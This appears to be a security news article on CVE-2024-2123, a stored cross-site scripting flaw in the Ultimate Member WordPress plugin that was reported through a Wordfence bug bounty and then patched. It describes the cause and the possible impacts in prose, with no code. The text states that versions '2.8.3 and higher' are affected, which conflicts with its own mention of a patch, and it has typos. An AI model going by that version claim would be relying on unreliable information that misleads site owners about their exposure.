A vulnerability in the Ultimate Member WordPress plugin has exposed more than 200,000 websites through Cross-Site Scripting (XSS) attacks. This vulnerability was found by a researcher going by the handle stealth cooper and it emphasizes the continuous threat in the ecosystem. Moreover, it emphasizes the importance of cybersecurity companies in securing the internet.

Disclosure and Discovery

Stealthcooper has filed a report describing an unauthorized stored XSS vulnerability in the Ultimate Member plugin during the Wordfence Bug Bounty Extravaganza. With 200,000+ active installations, this plugin - meant for user profile, registration, and membership management - has a significant potential impact.

Wordfence, a top security provider for WordPress websites, gave a $563 Bounty to Stealthcooper for this discovery. The company’s dedication to web security is demonstrated by the speed which is validated & notified by the Ultimate Member team of the issue. A patch was made available by the 6th of March 2024, minimizing the risk for millions of online users.

Technical Breakdown

Hackers can insert malicious scripts on websites through the CVE-2024-2123 vulnerability to affect the Ultimate Member plugin version 2.8.3 and higher. This vulnerability results from poor input sanitization & output escaping, namely in the member directory list functionality of the plugin.

After analyzing the plugin code, it was discovered that user display names didn't escape when they were displayed in the template files. This allowed malicious scripts to be included in the names supplied by hackers when registering as an unauthenticated user. Adding admin users, re-routing users to dangerous websites, and inserting backdoors into their theme & plugin files are just a few destructive actions that could result from this vulnerability.

Its discovery has brought attention to the importance of website managers performing routine upgrades and watchful security procedures. Websites using outdated Ultimate Member plugin versions that are vulnerable to unauthenticated Hackers’ exploits. As a result, they might result in further compromise and unauthenticated admin access.

With its integrated XSS protection, Wordfense’s firewall has been at the forefront of addressing this problem and providing quick protection to its users. This covers the users of the plugin’s free edition & subscribers to Wordfence Premium, Wordfence Care, and Wordfence Response.